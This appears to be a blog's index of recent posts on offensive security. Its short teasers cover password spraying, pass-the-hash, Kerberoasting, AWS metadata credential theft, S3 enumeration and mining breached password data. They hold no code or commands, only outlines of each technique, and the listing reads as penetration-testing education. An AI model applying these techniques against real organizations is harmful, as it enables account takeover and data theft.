Recent Posts

Using cloud_enum to Find S3 Buckets and More

S3, first introduced in 2006, is one of Amazon Web Services’ most popular services. This simple and fast cloud object solution has undoubtely made development, file sharing, content-delivery, and much more seamless for its users across the years. However, this flexibiltiy and arguably confusing design has led to some of the biggest data breaches ever seen. With this in mind, let’s walk through why I like using cloud_enum to find S3 buckets and other goodies.

Passing the Hash for Fun and Profit

Windows is cool because the hashes of passwords can actually be directly used to authenticate to services. That’s right, an adversary does not need to crack the hashes of passwords offline with an expensive password cracking rig, they can just directly authenticate using the hash. This technique is often called passing-the-hash, and we will explore a few methods you can use to perform this lateral movement technique.

I Love ScoutSuite and You Should Too

ScoutSuite is a multi-cloud security auditing tool written by the wonderful folks over at NCC group. I use it heavily, so I wanted to do a quick guide on getting it configured and running it in your own environment. The data and reports it generates is extremely useful from both an offensive and defensive perspective, and I trust that you’ll feel the same way after using it in your own platform.

Getting Started Spraying Microsoft Services

Password spraying is the process of brute-force guessing passwords against a list of accounts either externally or internally. Adversaries use this tactic to attempt to establish initial access within an organization and/or laterally move to alternate identities within a network. The process of getting started password spraying is surprisingly easy. This is in part thanks to the prevalence of remote-work solutions that have created the need to allow users to authenticate from pretty much anywhere. Cloud services such as Office365 actually assist the password spraying process, by providing a reliable, centralized location that can be used to attempt to breach a company’s accounts.

Farming Breached Password Data with Dehashed

Every year countless data breaches occur. From 700 Million LinkedIn users’ information getting leaked sometime between 2020 and 2021, to at least 500 million Yahoo accounts information being breached in 2014, to the notable 2017 Equifax data breach which impacted millions of individuals, it’s safe to say that breaches are a part of the everyday news cycle in the present day. These breaches contain a wide variety of data that has a variety of use cases. Social security numbers and credit card information can lead to fraud, age information and phone numbers can lead to targeted phishing attacks, and usernames and passwords can lead to… what exactly?

Attacking the AWS Metadata Service

“Since it first launched over 10 years ago, the Amazon EC2 Instance Metadata Service (IMDS) has helped customers build secure and scalable applications. The IMDS solved a big security headache for cloud users by providing access to temporary, frequently rotated credentials, removing the need to hardcode or distribute sensitive credentials to instances manually or programatically. “ However, as you may have noticed, the Metadata service possesses one unique characteristic that is useful to attackers. Along with providing information access to the given instance, it also provides credentials. Why does this matter?

An Introduction to Active Directory Enumeration

Active Directory is a platform that has received plenty of attention from adversaries and operators over the years. It has a rich history of exploitaiton methodologies, and new abuse mechanisms and regularly released by security researchs. Combine these factors with the prevalence that it is encountered within organizations, and you can quickly see why it’s a favorite target for attackers. There are a plethora of toolsets, cheatsheets, and enumeration options for Microsoft’s flagship directory service. Let’s outline a few of our favorite tools (hint: BloodHound) one can use to begin enumerating an Active Directory environment.

An Introduction to Kerberoasting

Kerberoasting is the attack that keeps on giving for adversaries and penesters alike. First documented in 2014 by Tim Medin, Kerberoasting is a tactic that can be used after an intial compromise to gain access to alternate accounts in an Active Directory domain. It has proven to be extremely potent in environments across the globe, and there’s a reason why it’s still worth talking about eight years after it’s initial (public) discovery. I’ll walk through an attack path that closely resembles ones I’ve used in the wild.

Harnessing the Power of LinkedIn and Talon for Password Spraying

I’ll talk through how one can use LinkedIn to gather listings of usernames and email addresses that can be combined with password spraying tactics. For demonstration of password spraying, we’ll target internal Active Directory services with the Talon toolset written by Tylous. I’ll also document some of the extra functionality I added to the tool that is now included in the main version.